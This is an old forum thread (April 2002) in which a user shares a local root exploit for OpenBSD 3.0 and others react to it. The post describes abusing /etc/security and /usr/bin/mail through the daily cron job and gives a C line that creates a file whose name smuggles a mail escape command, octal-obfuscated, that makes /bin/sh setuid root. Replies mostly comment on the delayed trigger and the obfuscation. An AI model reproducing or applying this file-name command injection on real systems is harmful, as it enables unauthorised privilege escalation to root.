April 18th, 2002, 08:01 PM
OpenBSD local root exploit
Found this local root exploit for OpenBSD 3.0 works pretty well.
* (c) 2002 email@example.com
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
* Credit goes to firstname.lastname@example.org for discovering vulnerability.
fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
April 18th, 2002, 08:54 PM
Kinda reminds me of the cucus (or howerver it was spelled) egg. You set it up, then you have to wait. This one just takes a lot longer.
\"Ignorance is bliss....
but only for your enemy\"
April 18th, 2002, 10:16 PM
Kind of reminds me of like a timebomb exploit/virus
April 19th, 2002, 04:47 AM
hrm interesting that its in /etc/security...........I wonder if it will work if the permissions are set like they should be for that .............
I will have to try it out.
Antionline in a nutshell
\"You\'re putting the fate of the world in the hands of a bunch of idiots I wouldn\'t trust with a potato gun\"
Trust your Technolust
April 21st, 2002, 10:56 AM
Hmmm... that's rather interesting... time to go look at my OpenBSD box, I guess.
Like the Octal "obfuscation" there... LOL
\"Windows has detected that a gnat has farted in the general vicinity. You must reboot for changes to take affect. Reboot now?\"